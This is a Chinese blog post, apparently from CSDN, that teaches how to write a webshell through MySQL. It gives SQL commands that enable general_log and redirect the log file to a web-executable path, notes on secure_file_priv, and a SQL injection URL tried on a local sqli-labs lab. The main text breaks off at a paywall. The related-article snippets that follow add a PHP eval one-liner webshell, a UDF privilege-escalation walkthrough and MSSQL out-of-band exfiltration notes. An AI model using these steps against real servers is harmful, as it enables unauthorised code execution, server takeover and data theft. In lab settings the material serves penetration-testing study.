MySQL写马详解

最新推荐文章于 2022-04-01 15:47:41 发布
最新推荐文章于 2022-04-01 15:47:41 发布
阅读量1.9k 收藏 4
点赞数
分类专栏: SQL注入 文章标签: mysql 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jklbnm12/article/details/119705959
版权

日志写马

条件

1.全局变量general_log为ON

MySQL的两个全局变量:

general_log指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

general_log_file 指的是日志的保存路径。

mysql> show global variables like "%general\_log%";+------------------+--------------------------------------------------------+| Variable\_name    | Value                                                  |+------------------+--------------------------------------------------------+| general\_log      | OFF                                                    || general\_log_file | D:\\phpStudy\\PHPTutorial\\MySQL\\data\\DESKTOP-UQAMJKA.log |+------------------+--------------------------------------------------------+2 rows in set (0.02 sec)

如果目前这个general_log为off状态,那么日志就没有被记录进去,所以要先打开这个全局变量。

set global general_log='on';

打开过后,日志文件中就会记录我们写的sql语句。我这里用sqli-labs来进行执行sql语句:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3--+

打开D:\phpStudy\PHPTutorial\MySQL\data\DESKTOP-UQAMJKA.log日志文件,成功记录

注:不管sql语句是否正确都会记录进去。

不过general_log_file可以直接通过SQL语句修改,而且必须修改为比如php后缀的文件,不然马不能被解析。下面讲第2点条件会详细说明。

2.需要secure_file_priv为空,即secure_file_priv="";或者secure_file_privgeneral_log_file 日志的保存路径的磁盘。不过general_log_file可以直接通过SQL语句修改,必须要修改为比如php后缀的文件,不然马不能被解析:

mysql> set global general\_log\_file='D:/1.log';Query OK, 0 rows affected (0.07 sec)mysql> show variables like "%general%";+------------------+----------+| Variable\_name    | Value    |+------------------+----------+| general\_log      | ON       || general\_log\_file | D:/1.log |+------------------+----------+2 rows in set (0.03 sec)#注:其中路径里的\\用\\\或者/代替,因为\\的话会消失一个mysql> set global general\_log\_file='D:\\1.log';Query OK, 0 rows affected (0.06 sec)mysql> show variables like "%general%";+------------------+---------+| Variable\_name    | Value   |+------------------+---------+| general\_log      | ON      || general\_log\_file | D:1.log |+------------------+---------+2 rows in set (0.03 sec)

然后在D盘下就出现1.log成为新的日志文件了。但是最后也要考虑能不能成功的连接到马,像如果secure_file_priv固定为G:\,而网站是搭在D盘上,那把general_log_file修改为G盘下的文件也连接不到,除非还有文件包含漏洞等等。

show global variables like '%secure%';查看可以写入的磁盘。
(1)当secure_file_priv为空,就可以写入磁盘的目录。
(2)当secure_file_priv为G:\,就可以写入G盘的文件。
(3)当secure_file_priv

最低0.47元/天 解锁文章
网安溦寀
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
webshell管理工具之中国
xdjxi的博客
01-16 557
实验环境物理机即可 实验工具:中国,phpstudy,dvwa网站 一:打开phpstudy开启apache和mysql 1:将dvwa网站放到www目录下 2:用浏览器进行访问 3:登录dvwa网站进行低等级下的文件上传 4:编写一句话木马进行上传 <?php @eval($_POST['password']); ?> 5:打开中国进行连接 添加数据 ...
连接数据库执行的时候总是转圈不出结果怎么办
bgsnnzy的博客
10-31 441
防火墙或网络出口限制:如果你的网络环境受到防火墙或其他网络出口限制的影响,可能导致无法正常与数据库进行通信。网络连接问题:请确保你的网络连接正常,尝试使用其他方式连接目标数据库(如命令行或其他数据库客户端)。数据库连接配置错误:确认你输入或配置的数据库连接信息(如主机地址、端口号、用户名、密码等)是否正确。请仔细检查这些参数,确保与目标数据库的配置一致。软件版本问题:确认你使用的是最新版本的,并且和所需的数据库驱动插件兼容。不同的数据库可能需要不同的插件支持,确保你已正确安装和配置了相应的插件。
MySQL提权专用网马
05-10
先前我发布了一个用于MYSQL提权的UDF,不过好像不少朋友不是很明白它的使用,不断有人问我它的使用方法,有人干脆叫我写个此UDF的专用PHP。说实话在我写这个PHP之前就只学过点ASP,对PHP那是一窍不通,所以程序中不妥之处在所难免,高手不要见笑。PHP写的比较笨,这里就不讲它怎么写的了,直接讲它的使用。 一、功能: 利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。 二、适用场合: 1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接 第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。 三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。
mysql传马_Mysql写马与提权
weixin_31289551的博客
01-18 706
密码读取直接从配置文件中读取数据库账号密码爆破账号密码读取数据库目录中的user.MYD,root后的字符串为其用户加密值,在线解密或者hashcat即可脱库利用条件:权限为rootsecure_file_priv没有具体值show global variables like '%secure_file_priv%'; 查看secure_file_priv的值secure_file_priv的值为...
MYSQL数据写马讲解
qq_49422880的博客
04-01 2634
MYSQL数据写马讲解0x01 前言0x02 日志写🐎0x03 into outfile写🐎 0x01 前言   最近正好在上数据库的课程,比较详细地学习了数据库各个方面地知识。感觉解决了之前不少的疑惑,再吐槽一下(学校开数据库这门课开的太晚了!)   下面进行分析与讲解数据库写入马的过程。 0x02 日志写🐎 众所周知我们所有的数据库的都有一个存放日志的文件,这个文件可以会进行记录数据库的操作语句,也可能不会记录数据库的操作语句,这却决于两个全局变量: general_log==>日志保存状态,有
Mysql注入root权限直接写一句话马
aipei5098的博客
04-16 567
首先我们的找到一个有注入的站:这里我用自己搭建的环境表示;大家不要乱来 http://localhost/pentest/sql/sql_injection_get.php?id=1 发现是root权限,我们尝试直接写马 首先要找到网站的主目录: 数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\ 进行判断,服务器可能为wampserver简...
MYSQL数据库脱库写马写一句话
weujie
04-24 999
0x00 前提条件 权限: 必须是ROOT secure_file_priv的限制 可以使用 mysql命令查询 show variables like '%secure%’; secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出 secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下 secure_f...
MySQL 读写分离实例详解
12-15
MySQL 读写分离 MySQL读写分离又一好办法 使用 com.mysql.jdbc.ReplicationDriver 在用过Amoeba 和 Cobar,还有dbware 等读写分离组件后,今天我的一个好朋友跟我讲,MySQL自身的也是可以读写分离的,因为他们提供了...
MySQL日志管理详解
02-01
复制进程的信息也会被记录记录event错误日志配置mysql的主配置文件:说明:对除了慢查日志中记录的查询信息都将记录下来,这将对服务器主机产生大量的压力,所以对于繁忙的服务器应该关闭这个日志与查询日志相关的...
MySQL索引详解大全
02-01
1、索引  索引是表的目录,在查找内容之前可以先在目录中查找索引位置,以此快速定位查询数据。对于索引,会保存在额外的文件中。2.索引,是数据库中专门用于帮助用户快速查询数据的一种数据结构。...
mysql详解
07-23
资源名称:mysql详解资源截图: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
[13期]mysql-root全手工注入写马实例实战
05-05 216
回显方便的小工具 转载于:https://www.cnblogs.com/sec875/p/10810649.html
MySQL数据库及数据表的创建
qq_45013917的博客
01-22 543
MySQL数据库及数据表的创建
真实渗透改编--综合渗透 sql注入写马+文件上传+udf提权 安鸾靶场SQL注入学习
AAAAAAAAAAAA66的博客
02-16 4499
从去年12月末到现在2月中,也算是把这个靶场的大多数题目刷了一遍,自己也能算的上一个初学者把,本文具体的教程在b站上有(建立靶场的师傅),而本文记录自己的解题和思考过程。如果之前没有接触到这些知识点的同学,可能会感觉到比较吃力,这是正常的。 哈兹本得的个人空间_哔哩哔哩_Bilibili 题目URL http://106.15.50.112:8023/ 目录 解题过程 sql注入写马 ​ 提权 准备udf文件(提权文件) 实施 解题过程 sql注入写马 寻找注入点 寻找网站真实.
实操教程:黑客如何瞄准和入侵网站的
jklbnm12的博客
06-27 4728
这个问题的答案可能很难确定,仅仅是因为有很多方法可以入侵一个网站。我们在本文中的目的是向您展示黑客在定位和入侵您的网站时最常用的技术! 假设这是您的站点:hack-test.com 让我们ping这个站点来获取服务器IP: 现在我们有 173.236.138.113 - 这是我们的目标站点托管的服务器 IP。 要查找托管在同一服务器上的其他站点,我们将使用 sameip.org: 托管在 IP 地址 173.236.138.113 上的相同 IP 26 站点 ID 领域 网站链接 我们需要有关您网站的更多
等保测评2.0:MySQL身份鉴别(上)
jklbnm12的博客
08-21 1322
一、 说明 本篇文章主要说一下MySQL数据中身份鉴别控制点中a测评项的相关知识点和理解。 二、 MySQL用户 2.1. 用户身份标识 MySQL数据库对于用户的标识和其它数据库有些不一样,不仅仅是用户名,而是username + host。 MySQL数据中user表的一部分字段如下: 这三个用户的用户名虽然都是root,但其实是三个不同的用户,其密码也是单独设置的。 查询当前登录账户,也可以看到用户的标识组成为username+host: 2.2. 登录匹配机制 既然用户的标示是两个字段的组合,匹
sql注入绕过与sqlmap绕过使用总结
jklbnm12的博客
08-12 867
前言 最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位师傅在实战中遇到waf可以看一看,能给各位师傅一点帮助,所以就想着写一篇。 还有一个很有可能是有注入点的但是,用了很多注入语句都不行,不知道怎么回事 后面再去慢慢研究。 正文 手动绕过 一:空格被过滤 当空被过滤掉的时候(也就是被删掉的意思)问你就可以使用编码或者注释进行绕过 %20,%09,/**/ &n
吴袖珍的高级MSSQL注入技巧
jklbnm12的博客
07-26 780
tl;dr 本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。 DNS Out-of-Band 如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。 利用fn_xe_file_target_read_file()的例子: h
mysql jdbc 参数详解
最新发布
11-17
MySQL JDBC参数详解如下: 1. user:连接数据库的用户名。 2. password:连接数据库的密码。 3. useUnicode:是否使用Unicode字符集,如果参数characterEncoding设置为gb2312或GBK,本参数值必须设置为true,默认为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安溦寀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值